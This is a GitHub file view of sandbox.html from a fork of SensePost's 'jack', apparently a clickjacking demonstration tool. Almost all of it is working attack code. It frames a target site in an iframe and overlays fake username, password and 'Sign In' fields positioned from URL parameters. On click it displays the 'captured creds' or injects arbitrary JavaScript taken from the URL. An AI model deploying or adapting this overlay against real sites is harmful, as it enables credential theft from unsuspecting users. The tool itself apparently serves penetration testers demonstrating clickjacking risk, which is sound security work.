forked from sensepost/jack
-
Notifications
You must be signed in to change notification settings - Fork 0
/
sandbox.html
105 lines (79 loc) · 3.62 KB
/
sandbox.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<script type="text/javascript" src="resources/js/jquery-1.11.0.js"></script>
<link rel="shortcut icon" type="image/x-icon"
href="resources/img/logo.ico">
<script type="text/javascript">
var config_url='';
function getURLParameter(sParam) {
var sPageURL='';
if (window.location.search.substring(1).length == 0) {
sPageURL = config_url.substring(1);
}
else {
sPageURL = window.location.search.substring(1);
}
var decoded = decodeURIComponent(sPageURL);
var sURLVariables = decoded.split('&');
for (var i = 0; i < sURLVariables.length; i++) {
var sParameterName = sURLVariables[i].split('=');
if (sParameterName[0] == sParam) {
return sParameterName[1];
}
}
}
$(document).ready(function () {
var targetURL = getURLParameter('target');
var userNameTop = getURLParameter('userNameTop');
var userNameLeft = getURLParameter('userNameLeft');
var passwordTop = getURLParameter('passwordTop');
var passwordLeft = getURLParameter('passwordLeft');
var buttonTop = getURLParameter('buttonTop');
var buttonLeft = getURLParameter('buttonLeft');
var passwordStyleParam = getURLParameter('passwordStyle');
var usernameStyleParam = getURLParameter('usernameStyle');
var buttonStyleParam = getURLParameter('buttonStyle');
var customJavaScript = getURLParameter('customJavaScript');
var emailStyle = usernameStyleParam + 'position: absolute; z-index: 2; top: ' + userNameTop + 'px; left: ' + userNameLeft + 'px;';
$('#inputMalEmail').attr('style', emailStyle);
var passwordStyle = passwordStyleParam + 'position: absolute; z-index: 2; top: ' + passwordTop + 'px; left: ' + passwordLeft + 'px;';
$('#inputMalPassword').attr('style', passwordStyle);
var buttonStyle = buttonStyleParam + 'position: absolute; z-index: 2; top: ' + buttonTop + 'px; left: ' + buttonLeft + 'px;';
$('#jacksButton').attr('style', buttonStyle);
$("#targetIframe").attr('src', targetURL);
$('#jacksButton').click(function () {
if (customJavaScript.length>0) {
$('<script>').attr('type', 'text/javascript').text(customJavaScript).appendTo('head');
}
else
{
var jacksEmail = $('#inputMalEmail').val();
var jacksPassword = $('#inputMalPassword').val();
console.log('Email: ' + jacksEmail);
alert('Captured Creds are: \nUsername is: ' + jacksEmail + ' \nAND\nPassword is: ' + jacksPassword);
location.reload();
}
});
});
</script>
</head>
<body style=" margin: 0px;padding: 0px; border: 0px;width: 100%;height: 100%;">
<input type="text"
style=""
autocomplete="off" class="" id="inputMalEmail" placeholder="">
<input type="password"
style=""
autocomplete="off" class="" id="inputMalPassword" placeholder="">
<button type="submit"
style=""
id="jacksButton">Sign In
</button>
<iframe id="targetIframe" scrolling="no" frameBorder="0"
style="z-index: 1; position: relative;overflow: hidden;margin: 0; padding: 0;display: block"
src="" width="100%"
height="1000">
</iframe>
</body>
</html>